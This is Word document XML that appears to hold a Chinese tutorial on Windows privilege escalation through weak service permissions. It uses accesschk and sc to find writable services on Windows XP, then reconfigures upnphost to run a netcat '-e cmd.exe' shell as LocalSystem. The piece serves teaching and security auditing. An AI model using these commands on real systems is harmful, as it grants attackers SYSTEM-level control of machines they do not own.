        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0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"%CE%94t-for-t7-to-t10-Roll-Up-Your-Sleeves" \o "Δt for t7 to t10 - Roll Up Your Sleeves"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66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Δt for t7 to t10 - Roll Up Your Sleeves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5%B8%8C%E6%9C%9B%E5%88%B0%E7%9B%AE%E5%89%8D%E4%B8%BA%E6%AD%A2%E6%88%91%E4%BB%AC%E5%B7%B2%E7%BB%8F%E6%88%90%E5%8A%9F%E6%8F%90%E6%9D%83%EF%BC%8C%E5%A6%82%E6%9E%9C%E7%A1%AE%E5%AE%9E%E8%BF%98%E6%B2%A1%E6%9C%89%E6%88%90%E5%8A%9F%E6%8F%90%E6%9D%83%E7%9A%84%E8%AF%9D%E4%B8%8B%E9%9D%A2%E8%BF%98%E6%9C%89%E4%B8%80%E4%BA%9B%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95%E3%80%82%E5%9C%A8%E8%BF%99%E6%9C%80%E5%90%8E%E4%B8%80%E9%83%A8%E5%88%86%EF%BC%8C%E6%88%91%E4%BB%AC%E4%BC%9A%E6%9F%A5%E7%9C%8BWindows-%E6%9C%8D%E5%8A%A1%E5%92%8C%E6%96%87%E4%BB%B6-%E6%96%87%E4%BB%B6%E5%A4%B9-%E6%9D%83%E9%99%90%EF%BC%8C%E6%88%91%E4%BB%AC%E7%9A%84%E7%9B%AE%E7%9A%84%E6%98%AF%E5%88%A9%E7%94%A8%E5%BC%B1%E6%9D%83%E9%99%90%E6%9D%A5%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83%E3%80%82%E5%BD%93%E7%84%B6%E8%BF%99%E9%87%8C%E6%9C%80%E4%B8%BB%E8%A6%81%E6%98%AF%E9%92%88%E5%AF%B9Windows-XP-%E7%B3%BB%E7%BB%9F" \o "希望到目前为止我们已经成功提权，如果确实还没有成功提权的话下面还有一些攻击方法。在这最后一部分，我们会查看Windows 服务和文件/文件夹 权限，我们的目的是利用弱权限来进行提权。当然这里最主要是针对Windows XP 系统"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希望到目前为止我们已经成功提权，如果确实还没有成功提权的话下面还有一些攻击方法。在这最后一部分，我们会查看Windows 服务和文件/文件夹 权限，我们的目的是利用弱权限来进行提权。当然这里最主要是针对Windows XP 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6%8E%A5%E4%B8%8B%E6%9D%A5%E6%88%91%E4%BB%AC%E5%B0%86%E5%88%A9%E7%94%A8%E4%B8%80%E4%B8%AAWindows%E4%B8%AD%E5%A4%A7%E7%A5%9E%E7%BA%A7%E7%9A%84%E5%B7%A5%E5%85%B7%E9%9B%86Sysinternals-Suite-%E4%B8%AD%E7%9A%84accesschk-exe-%E6%9D%A5%E6%89%B9%E9%87%8F%E6%A3%80%E6%9F%A5%E6%9D%83%E9%99%90%E4%BF%A1%E6%81%AF%EF%BC%8C%E8%AF%BB%E8%80%85%E5%8F%AF%E4%BB%A5%E4%BB%8E%E8%BF%99%E9%87%8C%E4%B8%8B%E8%BD%BD%E8%BF%99%E4%B8%AA%E5%B7%A5%E5%85%B7%E9%9B%86" \o "接下来我们将利用一个Windows中大神级的工具集Sysinternals Suite 中的accesschk.exe 来批量检查权限信息，读者可以从这里下载这个工具集"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接下来我们将利用一个Windows中大神级的工具集Sysinternals Suite 中的accesschk.exe 来批量检查权限信息，读者可以从这里</w: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"https://download.sysinternals.com/files/SysinternalsSuite.zip" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank"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t>下载这个工具集</w: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6%8E%A5%E4%B8%8B%E6%9D%A5%E6%88%91%E4%BB%AC%E4%BB%8EWindows-%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%BC%80%E5%A7%8B%EF%BC%8C%E9%80%9A%E8%BF%87%E9%87%8D%E6%96%B0%E9%85%8D%E7%BD%AEservice-%E7%9A%84%E5%8F%82%E6%95%B0%E8%83%BD%E5%A4%9F%E8%AE%A9%E6%88%91%E4%BB%AC%E5%BF%AB%E9%80%9F%E8%BE%BE%E5%88%B0%E7%9B%AE%E7%9A%84%E3%80%82" \o "接下来我们从Windows 的服务开始，通过重新配置service 的参数能够让我们快速达到目的。"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接下来我们从Windows 的服务开始，通过重新配置service 的参数能够让我们快速达到目的。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"/>
        <w:gridCol w:w="8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# We can use sc to query, configure and manage windows services.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C:\Windows\system32&gt; sc qc Spooler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[SC] QueryServiceConfig SUCCESS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SERVICE_NAME: Spooler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TYPE               : 110  WIN32_OWN_PROCESS (interactive)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START_TYPE         : 2   AUTO_START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ERROR_CONTROL      : 1   NORMAL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BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe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LOAD_ORDER_GROUP   : SpoolerGroup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TAG                :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DISPLAY_NAME       : Print Spooler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DEPENDENCIES       : RPCSS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                   : http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SERVICE_START_NAME : LocalSystem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"%E6%88%91%E4%BB%AC%E4%B9%9F%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8accesschk-%E6%9D%A5%E6%A3%80%E6%9F%A5%E6%AF%8F%E4%B8%AA%E6%9C%8D%E5%8A%A1%E7%9A%84%E6%9D%83%E9%99%90%E7%BA%A7%E5%88%AB" \o "我们也可以使用accesschk 来检查每个服务的权限级别"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我们也可以使用accesschk 来检查每个服务的权限级别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"/>
        <w:gridCol w:w="8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26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# We can see the permissions that each user level has, you can also use "accesschk.exe -ucqv *" to list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all services.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C:\&gt; accesschk.exe -ucqv Spooler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Spooler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R  NT AUTHORITY\Authenticated Users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SERVICE_QUERY_STATUS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SERVICE_QUERY_CONFIG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SERVICE_INTERROGATE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SERVICE_ENUMERATE_DEPENDENTS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SERVICE_USER_DEFINED_CONTROL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READ_CONTROL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R  BUILTIN\Power Users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SERVICE_QUERY_STATUS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SERVICE_QUERY_CONFIG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SERVICE_INTERROGATE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SERVICE_ENUMERATE_DEPENDENTS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SERVICE_USER_DEFINED_CONTROL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READ_CONTROL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RW BUILTIN\Administrators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SERVICE_ALL_ACCESS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RW NT AUTHORITY\SYSTEM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SERVICE_ALL_ACCESS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Accesschk-%E8%83%BD%E5%A4%9F%E8%87%AA%E5%8A%A8%E6%A3%80%E6%9F%A5%E5%9C%A8%E6%9F%90%E4%B8%AA%E7%94%A8%E6%88%B7%E7%AD%89%E7%BA%A7%E4%B8%8B%E6%88%91%E4%BB%AC%E5%AF%B9%E4%BA%8EWindows-%E6%9C%8D%E5%8A%A1%E6%98%AF%E5%90%A6%E5%85%B7%E6%9C%89%E5%86%99%E5%85%A5%E6%9D%83%E9%99%90%E3%80%82%E4%BD%9C%E4%B8%BA%E4%B8%80%E4%B8%AA%E4%BD%8E%E6%9D%83%E9%99%90%E7%9A%84%E7%94%A8%E6%88%B7%EF%BC%8C%E6%88%91%E4%BB%AC%E9%80%9A%E5%B8%B8%E4%BC%9A%E6%83%B3%E8%A6%81%E5%8E%BB%E6%A3%80%E6%9F%A5-%E2%80%9CAuthenticated-Users%E2%80%9D-%E3%80%82" \o "Accesschk 能够自动检查在某个用户等级下我们对于Windows 服务是否具有写入权限。作为一个低权限的用户，我们通常会想要去检查 \“Authenticated Users\” 。"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Accesschk 能够自动检查在某个用户等级下我们对于Windows 服务是否具有写入权限。作为一个低权限的用户，我们通常会想要去检查 “Authenticated Users”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"%E5%92%B1%E4%BB%AC%E6%9D%A5%E6%AF%94%E8%BE%83%E4%B8%80%E4%B8%8B%E5%9C%A8Windows-8-%E5%92%8C-Windows-XP-SP0-%E4%B8%AD%E8%BE%93%E5%87%BA%E7%9A%84%E4%B8%8D%E5%90%8C" \o "咱们来比较一下在Windows 8 和 Windows XP SP0 中输出的不同,"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咱们来比较一下在Windows 8 和 Windows XP SP0 中输出的不同,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"/>
        <w:gridCol w:w="8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42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# This is on Windows 8.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C:\Users\b33f\tools\Sysinternals&gt; accesschk.exe -uwcqv "Authenticated Users" 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No matching objects found.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# On a default Windows XP SP0 we can see there is a pretty big security fail.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C:\&gt; accesschk.exe -uwcqv "Authenticated Users" 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RW SSDPSRV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SERVICE_ALL_ACCESS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RW upnphost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SERVICE_ALL_ACCESS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C:\&gt; accesschk.exe -ucqv SSDPSRV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SSDPSRV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RW NT AUTHORITY\SYSTEM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SERVICE_ALL_ACCESS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RW BUILTIN\Administrators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SERVICE_ALL_ACCESS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RW NT AUTHORITY\Authenticated Users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SERVICE_ALL_ACCESS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RW BUILTIN\Power Users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SERVICE_ALL_ACCESS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RW NT AUTHORITY\LOCAL SERVICE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SERVICE_ALL_ACCESS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C:\&gt; accesschk.exe -ucqv upnphost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upnphost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RW NT AUTHORITY\SYSTEM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SERVICE_ALL_ACCESS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RW BUILTIN\Administrators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SERVICE_ALL_ACCESS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RW NT AUTHORITY\Authenticated Users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SERVICE_ALL_ACCESS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RW BUILTIN\Power Users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SERVICE_ALL_ACCESS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RW NT AUTHORITY\LOCAL SERVICE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SERVICE_ALL_ACCESS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9%80%9A%E8%BF%87%E4%BB%A5%E4%B8%8A%E4%BF%A1%E6%81%AF%EF%BC%8C%E6%88%91%E4%BB%AC%E8%83%BD%E7%9C%8B%E5%88%B0upnphost-%E5%85%B7%E6%9C%89%E5%BE%88%E5%A4%A7%E7%9A%84%E6%9D%83%E9%99%90%EF%BC%8C%E4%B8%8B%E9%9D%A2%E6%88%91%E5%B0%86%E6%BC%94%E7%A4%BA%E4%B8%80%E4%B8%8B%E5%A6%82%E4%BD%95%E5%AE%9E%E9%99%85%E5%BA%94%E7%94%A8%E8%BF%99%E4%BA%9B%E4%BF%A1%E6%81%AF%E6%9D%A5%E5%8F%8D%E5%BC%B9-system-shell" \o "通过以上信息，我们能看到upnphost 具有很大的权限，下面我将演示一下如何实际应用这些信息来反弹 system shell"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通过以上信息，我们能看到upnphost 具有很大的权限，下面我将演示一下如何实际应用这些信息来反弹 system shell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"/>
        <w:gridCol w:w="8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D3D3D3"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="2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kern w:val="0"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>37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C:\&gt; sc qc upnphost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[SC] GetServiceConfig SUCCESS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SERVICE_NAME: upnphost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TYPE               : 20  WIN32_SHARE_PROCESS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START_TYPE         : 3   DEMAND_START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ERROR_CONTROL      : 1   NORMAL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BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService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LOAD_ORDER_GROUP   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TAG                :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DISPLAY_NAME       : Universal Plug and Play Device Host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DEPENDENCIES       : SSDPSRV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SERVICE_START_NAME : NT AUTHORITY\LocalService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C:\&gt; sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"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[SC] ChangeServiceConfig SUCCESS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C:\&gt; sc config upnphost obj= ".\LocalSystem" password= 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[SC] ChangeServiceConfig SUCCESS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C:\&gt; sc qc upnphost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[SC] GetServiceConfig SUCCESS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SERVICE_NAME: upnphost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TYPE               : 20  WIN32_SHARE_PROCESS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START_TYPE         : 3   DEMAND_START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ERROR_CONTROL      : 1   NORMAL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BINARY_PATH_NAME   : C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe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LOAD_ORDER_GROUP   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TAG                :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DISPLAY_NAME       : Universal Plug and Play Device Host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DEPENDENCIES       : SSDPSRV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 xml:space="preserve">        SERVICE_START_NAME : LocalSystem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CCCCCC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kern w:val="0"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>C:\&gt; net start upnphost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78" w:beforeAutospacing="0" w:after="178" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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1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4%B8%8B%E5%9B%BE%E5%88%97%E5%87%BA%E4%BA%86%E5%85%B3%E4%BA%8EWindows-%E6%8F%90%E6%9D%83%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BB%8B%E7%BB%8D%EF%BC%8C%E4%BB%BB%E4%BD%95%E8%BF%99%E4%BA%9B%E8%AE%BF%E9%97%AE%E6%9D%83%E9%99%90%E9%83%BD%E5%B0%86%E7%BB%99%E6%88%91%E4%BB%AC%E5%B8%A6%E6%9D%A5SYSTEM-shell" \o "下图列出了关于Windows 提权的一些介绍，任何这些访问权限都将给我们带来SYSTEM shell."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下图列出了关于Windows 提权的一些介绍，任何这些访问权限都将给我们带来SYSTEM shell.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78" w:beforeAutospacing="0" w:after="178" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline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7781925" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4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105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0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"%E7%BB%93%E8%AF%AD" \o "结语"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40"/>
          <w:szCs w:val="40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66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>结语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pacing w:before="300" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/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</w:pP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instrText xml:space="preserve"> HYPERLINK "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/" \l "%E4%BB%A5%E4%B8%8A%E5%A4%A7%E9%83%A8%E5%88%86%E9%83%BD%E6%98%AF%E6%A0%B9%E6%8D%AE%E5%A4%96%E6%96%87%E7%BF%BB%E8%AF%91%E8%BF%87%E6%9D%A5%E7%9A%84%EF%BC%8C%E7%84%B6%E5%90%8E%E6%88%91%E5%81%9A%E4%BA%86%E9%80%82%E5%BD%93%E4%BF%AE%E6%94%B9%EF%BC%8C%E5%86%8D%E6%AC%A1%E6%84%9F%E8%B0%A2%E5%A4%A7%E5%93%A5-hl0rey-%E7%9A%84%E5%BB%BA%E8%AE%AE%E5%92%8C%E5%B8%AE%E5%8A%A9%EF%BC%8C%E4%B8%8B%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B0%86%E6%98%AF%E6%88%91%E8%87%AA%E5%B7%B1%E7%9A%84%E6%80%9D%E8%B7%AF%E6%80%BB%E7%BB%93%EF%BC%8C%E5%B0%86%E4%BC%9A%E6%9B%B4%E6%9C%89%E8%B6%A3%E4%B9%9F%E6%9B%B4%E5%8A%A0%E5%AE%B9%E6%98%93%E6%93%8D%E4%BD%9C%EF%BC%81%EF%BC%81" \o "以上大部分都是根据外文翻译过来的，然后我做了适当修改，再次感谢大哥@hl0rey 的建议和帮助，下一篇文章将是我自己的思路总结，将会更有趣也更加容易操作！！" </w:instrText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Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="2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  <w:t>以上大部分都是根据外文翻译过来的，然后我做了适当修改，再次感谢大哥@hl0rey 的建议和帮助，下一篇文章将是我自己的思路总结，将会更有趣也更加容易操作！！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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</w:pPr>
    </w:p>
    <w:p>
      <w:pP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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="574C4C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline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"https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/"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https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/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01DE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80501D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FA8BCAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FA8BC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1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hyperlink" Target="http://p1m5hqy4k.bkt.clouddn.com/kali%E5%AE%89%E8%A3%85kvm%E5%85%A5%E5%9D%91%E7%AC%94%E8%AE%B0/20180410151231_nF2KHi_Screenshot.jpe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www.fuzzysecurity.com/tutorials/images/priv06_big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fuzzysecurity.com/tutorials/images/priv05_big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://www.fuzzysecurity.com/tutorials/images/priv02_big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2019-06-14T13:39:39Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-14T13:40:00Z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